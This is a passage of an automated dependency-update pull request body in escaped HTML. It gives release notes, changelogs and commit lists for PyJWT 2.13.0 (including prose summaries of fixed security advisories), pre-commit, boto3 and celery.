href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pre-commit` from 4.5.1 to 4.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/releases\"\u003epre-commit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epre-commit v4.6.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier usage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/blob/main/CHANGELOG.md\"\u003epre-commit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.6.0 - 2026-04-21\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier\nusage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f35134b05028ec938ac605ae500fdf95462655d3\"\u003e\u003ccode\u003ef35134b\u003c/code\u003e\u003c/a\u003e v4.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2a51ffcb81f6c8ed2e6467913c3343a8800f3ab9\"\u003e\u003ccode\u003e2a51ffc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e from pre-commit/hook-impl-optional-hook-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/d7dee322abfc765b042f2e3b872aab3c3a867610\"\u003e\u003ccode\u003ed7dee32\u003c/code\u003e\u003c/a\u003e make --hook-dir optional for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/965aeb1c680e8b526342153547f0ec014484c63d\"\u003e\u003ccode\u003e965aeb1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e from pre-commit/hook-impl-required\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2eacc064aa9b5bb33d3a0d84a234b475e34f3096\"\u003e\u003ccode\u003e2eacc06\u003c/code\u003e\u003c/a\u003e --hook-type is required for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f5678bf4ac35cffc0ff7174ad85f7fdc2a5c977e\"\u003e\u003ccode\u003ef5678bf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3657\"\u003e#3657\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/054cc5bd6bb1b20faa1eefe09f0de3b68fceee94\"\u003e\u003ccode\u003e054cc5b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/5c0f3024d2524f6e029a4c333392fd9be9fb27f6\"\u003e\u003ccode\u003e5c0f302\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3652\"\u003e#3652\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/a5d91142676630f8130020b35e166e0c0e92b8f4\"\u003e\u003ccode\u003ea5d9114\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/129a1f5ca1eaee0c952a5e7a07faae305c5e15bc\"\u003e\u003ccode\u003e129a1f5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3641\"\u003e#3641\u003c/a\u003e from pre-commit/mxr-patch-1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pre-commit/pre-commit/compare/v4.5.1...v4.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `boto3` from 1.42.68 to 1.43.23\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/f2106e0d34cb87a89f066f06373d337da503b0d5\"\u003e\u003ccode\u003ef2106e0\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.23'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/d7e5b7c20dfad5465df92d55541638ecfc09e981\"\u003e\u003ccode\u003ed7e5b7c\u003c/code\u003e\u003c/a\u003e Bumping version to 1.43.23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/86efe86a74067974ef06571cb101697a8afd66a5\"\u003e\u003ccode\u003e86efe86\u003c/code\u003e\u003c/a\u003e Add changelog entries from botocore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/83844402cce909b1ceded705ceb69cdcefec445b\"\u003e\u003ccode\u003e8384440\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.22'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/eea01a7257d0278255c8c20d7d303ca779135c3c\"\u003e\u003ccode\u003eeea01a7\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.22' into develop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/eff8ee7efd00440fa4a9feb37371c35430cebe06\"\u003e\u003ccode\u003eeff8ee7\u003c/code\u003e\u003c/a\u003e Bumping version to 1.43.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/880860d297137acb995926f4f11e9b888b6d9755\"\u003e\u003ccode\u003e880860d\u003c/code\u003e\u003c/a\u003e Add changelog entries from botocore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/400e1f677f6e912a2b32ce0e6409f66d5385777f\"\u003e\u003ccode\u003e400e1f6\u003c/code\u003e\u003c/a\u003e Add reference to post-quantum cryptography in security docs page (\u003ca href=\"https://redirect.github.com/boto/boto3/issues/4793\"\u003e#4793\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/0df64b349cac1df15349f91b00fd867ff97e7d68\"\u003e\u003ccode\u003e0df64b3\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.21'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/d3d327fc4bdeb0bc8ab38d5ddbdd49d6af247dbf\"\u003e\u003ccode\u003ed3d327f\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.21' into develop\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/boto/boto3/compare/1.42.68...1.43.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 5.6.2 to 5.6.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.6.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Django worker recursion bug + defensive checks for pool_cls.\u003cstrong\u003emodule\u003c/strong\u003e by \u003ca href=\"https://github.com/maycuatroi1\"\u003e\u003ccode\u003e@​maycuatroi1\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10048\"\u003ecelery/celery#10048\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Update user_preload_options example to use click. by \u003ca href=\"https://github.com/jorsyk\"\u003e\u003ccode\u003e@​jorsyk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10056\"\u003ecelery/celery#10056\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix invalid configuration key \u0026quot;bootstrap_servers\u0026quot; in Kafka demo by \u003ca href=\"https://github.com/jorsyk\"\u003e\u003ccode\u003e@​jorsyk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10060\"\u003ecelery/celery#10060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix broken images on PyPI page by \u003ca href=\"https://github.com/Timour-Ilyas\"\u003e\u003ccode\u003e@​Timour-Ilyas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10066\"\u003ecelery/celery#10066\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove broken reference. by \u003ca href=\"https://github.com/sueannioanis\"\u003e\u003ccode\u003e@​sueannioanis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10071\"\u003ecelery/celery#10071\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved --dist=loadscope from smoke tests by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10073\"\u003ecelery/celery#10073\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Clarify task_retry signal args may be None by \u003ca href=\"https://github.com/GangEunzzang\"\u003e\u003ccode\u003e@​GangEunzzang\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10076\"\u003ecelery/celery#10076\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate example for Django by \u003ca href=\"https://github.com/sbc-khacnha\"\u003e\u003ccode\u003e@​sbc-khacnha\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10081\"\u003ecelery/celery#10081\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake tests compatible with pymongo \u0026gt;= 4.16 by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10074\"\u003ecelery/celery#10074\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: source install of cassandra-driver by \u003ca href=\"https://github.com/Izzette\"\u003e\u003ccode\u003e@​Izzette\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10105\"\u003ecelery/celery#10105\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: register task cross-reference role in Sphinx extension by \u003ca href=\"https://github.com/veeceey\"\u003e\u003ccode\u003e@​veeceey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10100\"\u003ecelery/celery#10100\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid cycle detection in native delayed delivery by \u003ca href=\"https://github.com/Izzette\"\u003e\u003ccode\u003e@​Izzette\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10095\"\u003ecelery/celery#10095\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(asynpool): avoid AttributeError when proc lacks _sentinel_poll by \u003ca href=\"https://github.com/mriddle\"\u003e\u003ccode\u003e@​mriddle\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10086\"\u003ecelery/celery#10086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix dusk_astronomical horizon sign (+18 -\u0026gt; -18) by \u003ca href=\"https://github.com/Mr-Neutr0n\"\u003e\u003ccode\u003e@​Mr-Neutr0n\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10121\"\u003ecelery/celery#10121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix/10106 onupdate col use lambda func by \u003ca 